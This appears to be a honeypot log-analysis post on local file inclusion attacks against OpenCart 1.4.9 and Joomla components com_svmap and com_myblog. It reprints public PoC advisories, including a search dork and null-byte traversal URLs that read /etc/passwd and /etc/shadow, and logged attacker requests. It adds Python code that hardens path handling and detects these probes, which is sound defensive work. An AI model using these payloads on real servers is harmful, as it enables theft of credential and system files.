Our web server honeypot log analysis has picked up some targeted local file inclusion (LFI) attacks against a few specific PHP components.
Here is the PoC exploit code, followed by the matching requests from our honeypot logs:
#### Title : OpenCart 1.4.9 LFI Multiple Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Multi LFI
# Tested on : Windows XP sp3 FR
####
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
[»] Go0gle Dork : "Powered by opencart 1.4.9"
####
# Exploit :
http://[localhost]/[Path]/index.php?route=common/seo_url&product_id=[LFI]%00
http://[localhost]/[Path]/index.php?route=common/seo_url&category_id=1&path=[LFI]%00
http://[localhost]/[Path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00
=================================================================================================

96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
96.127.137.26 - - [08/Jan/2012:09:05:32 +0100] "GET /index.php?route=common/seo_url&product_id=../../../../../../../../../etc/security/passwd%00.php HTTP/1.1" 404 291 "-" "Microsoft Pocket Internet Explorer/0.6"
Notice that these LFI payloads use null bytes (%00) to terminate the injected path and then append the file extension the application expects (.php). On PHP builds affected by null-byte poisoning, the path is handed to C string functions that stop reading at the first NUL, so the ".php" suffix the application concatenates is discarded and the attacker-chosen file is the one that gets opened.
Here is the PoC exploit code for the next component, again followed by the matching honeypot requests:
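To make that truncation concrete, here is an added Python model (not OpenCart's or Joomla's code, and not from the original post) of the two ways a route parameter can be handled: the legacy behaviour, in which the C-level file API stops at the first NUL so the appended suffix is lost, and a hardened version that rejects NUL bytes and confines the resolved path to the controller directory. The web root, the controller directory and the parameter values are assumptions chosen for the illustration.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed layout of a hypothetical PHP application (not OpenCart's or Joomla's real paths).
WEB_ROOT = "/var/www/html"
CONTROLLER_DIR = posixpath.join(WEB_ROOT, "controller")


def legacy_include_path(user_value: str) -> str:
    """Model of the vulnerable pattern the PoCs above target.

    A route parameter is URL-decoded, concatenated with a fixed ".php" suffix and
    handed to the file API.  PHP builds affected by null-byte poisoning (before
    5.3.4) passed that string to C functions that stop at the first NUL, so the
    suffix the developer appended is silently dropped.  Returns the path the
    filesystem layer would actually open.
    """
    decoded = unquote(user_value)                     # "%00" becomes "\x00"
    joined = CONTROLLER_DIR + "/" + decoded + ".php"  # what the developer thinks is opened
    truncated = joined.split("\x00", 1)[0]            # what the C layer actually sees
    return posixpath.normpath(truncated)


def safe_include_path(user_value: str) -> Optional[str]:
    """Hardened version: refuse NUL bytes, resolve the candidate path, and accept
    it only if it still lies inside CONTROLLER_DIR.  Returns None on rejection.
    An allow-list of known route names is stricter still and preferable where
    the set of controllers is fixed.
    """
    decoded = unquote(user_value)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(CONTROLLER_DIR + "/" + decoded + ".php")
    # commonpath() shrinks to a shorter prefix as soon as the traversal escapes.
    if posixpath.commonpath([CONTROLLER_DIR, candidate]) != CONTROLLER_DIR:
        return None
    return candidate


if __name__ == "__main__":
    payload = "../../../../../../../../etc/passwd%00"  # shape of the PoC parameter
    print("legacy opens :", legacy_include_path(payload))  # /etc/passwd
    print("hardened     :", safe_include_path(payload))    # None
    print("hardened, ok :", safe_include_path("common"))   # /var/www/html/controller/common.php
```

The legacy model returns `/etc/passwd` for the PoC-shaped value because `normpath` collapses the traversal once the `.php` suffix has been cut off at the NUL; the hardened version rejects the same value twice over, first on the NUL and then on the containment check, while a plain route name still resolves inside the controller directory.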
================================================================================================
Title : Joomla Component com_svmap v1.1.1 LFI Vulnerability
Vendor : http://www.la-souris-verte.com
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
================================================================================================
[+] Exploit
http://[site]/[path]/index.php?option=com_svmap&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
================================================================================================

91.215.216.44 - - [08/Jan/2012:15:07:15 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:16 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:19 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:19 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:20 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:20 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:21 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:22 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
91.215.216.44 - - [08/Jan/2012:15:07:22 +0900] "GET //index.php?option=com_svmap&controller=../../../../../../../etc/shadow%00.php HTTP/1.1" 404 216
Here is the PoC exploit code for the third component, followed by the matching honeypot requests:
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_blog LFI Vulnerability
[~] Author : DevilZ TM By D3v1l
[~] Homepage : http://www.DEVILZTM.com
[~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@gmail.com
[~]######################################### ExploiT #################################################[~]
[~] Vulnerable File : http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=[LFI]
[~] ExploiT : ../../../../../../../../etc/passwd%00
[~] Example : http://127.0.0.1/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../etc/passwd%00

69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
97.74.193.209 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)"
69.167.178.92 - - [07/Jan/2012:12:10:28 +0100] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
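The three sets of records above share one shape: a single source, a single query parameter, a traversal whose depth steps down one request at a time, a %00, and a well-known target file. The following Python detector is an added example, not part of the original post and not Trustwave tooling; it parses combined-format access-log lines, fully URL-decodes each query parameter, scores the LFI indicators the post points out (traversal depth, embedded NUL, sensitive target), and groups hits by source and parameter so the depth-walking pattern becomes visible. The sample log lines are constructed to mirror the honeypot records (RFC 5737 addresses, the same parameter names and target files); the regular expression, the target list and the scoring thresholds are my choices, not something the post specifies.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# "combined" access-log layout, as in the honeypot excerpts (referer/agent optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Target files seen in the records above; extend for your own environment.
SENSITIVE_TARGETS = ("/etc/security/passwd", "/etc/passwd", "/etc/shadow", "/etc/group")


def decode_param(value: str) -> str:
    """Repeat URL-decoding until stable (catches double encoding such as %252e%252e)
    and fold backslashes so Windows-style traversal is counted the same way."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value.replace("\\", "/")


def analyse_line(line: str) -> List[dict]:
    """Return one finding per query parameter carrying an LFI indicator:
    a '../' sequence, an embedded NUL, or a reference to a sensitive file."""
    match = LOG_RE.match(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group("target")).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_param(raw)
        depth = value.count("../")
        null_byte = "\x00" in value
        target = next((t for t in SENSITIVE_TARGETS if t in value), None)
        if depth or null_byte or target:
            findings.append({
                "ip": match.group("ip"), "param": name, "depth": depth,
                "null_byte": null_byte, "target": target,
                "status": int(match.group("status")),
            })
    return findings


def summarise(lines: List[str]) -> Dict[Tuple[str, str], dict]:
    """Group findings by (source IP, parameter).  The honeypot pattern is one
    source walking the traversal depth down request by request, so the set of
    depths per group is itself a useful signature."""
    groups = defaultdict(lambda: {"count": 0, "depths": set(), "targets": set(), "null_byte": False})
    for line in lines:
        for f in analyse_line(line):
            g = groups[(f["ip"], f["param"])]
            g["count"] += 1
            g["depths"].add(f["depth"])
            if f["target"]:
                g["targets"].add(f["target"])
            g["null_byte"] = g["null_byte"] or f["null_byte"]
    return dict(groups)


def _line(ip: str, target: str) -> str:
    """Build a constructed combined-format record (timestamp and sizes are fixed)."""
    return f'{ip} - - [08/Jan/2012:09:05:32 +0100] "GET {target} HTTP/1.1" 404 291 "-" "constructed-agent/1.0"'


# Constructed sample, modelled on the three honeypot excerpts (RFC 5737 addresses).
SAMPLE_LOG = [
    *[_line("192.0.2.10", f"/index.php?route=common/seo_url&product_id={'../' * n}etc/security/passwd%00.php")
      for n in range(15, 11, -1)],
    _line("192.0.2.20", "//index.php?option=com_svmap&controller=" + "../" * 9 + "etc/shadow%00.php"),
    _line("192.0.2.30", "//index.php?option=com_myblog&Itemid=12&task=" + "../" * 8 + "etc/group%00"),
    _line("192.0.2.40", "/index.php?route=product/product&product_id=42"),  # benign control
]

if __name__ == "__main__":
    for key, group in summarise(SAMPLE_LOG).items():
        print(key, group)
```

Run against a real access log, feed the file's lines to `summarise()`; a group whose `depths` set spans a contiguous range and whose `null_byte` flag is set is the scanner signature seen above, while a benign request such as the last sample line produces no finding at all. Note that the honeypot answered every one of these probes with a 404, so the status code alone tells you nothing about whether the component was present; the parameter content is what carries the signal.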